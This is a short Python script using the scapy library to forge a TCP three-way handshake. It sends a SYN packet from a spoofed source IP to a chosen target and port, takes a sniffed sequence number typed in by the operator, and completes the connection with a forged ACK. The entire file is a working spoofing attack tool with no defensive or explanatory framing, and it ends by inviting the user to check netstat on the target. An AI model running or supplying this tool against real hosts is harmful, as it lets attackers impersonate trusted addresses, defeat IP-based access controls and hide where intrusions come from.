```
import sys
from scapy.all import *
if len(sys.argv) != 4:
    print ("Usage: ./spoof.py <target> <spoofed ip> <port>")
    sys.exit(1)
target = sys.argv[1]
spoofed_ip = sys.argv[2]
port = int(sys.argv[3])
p1=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='S')
print("SYN Packet Info:")
p1.show()
send(p1)
print ("Okay, SYN sent. Enter the sniffed sequence number now: ")
seq=sys.stdin.readline()
print ("Okay, using sequence number " + seq)
seq=int(seq[:-1])
p2=IP(dst=target,src=spoofed_ip)/TCP(dport=port,sport=5000,flags='A',
                                    ack=seq+1, seq=1)
print("ACK Packet Info:")
p2.show()
send(p2)
print ("Okay, final ACK sent. Check netstat on your target :-)")
```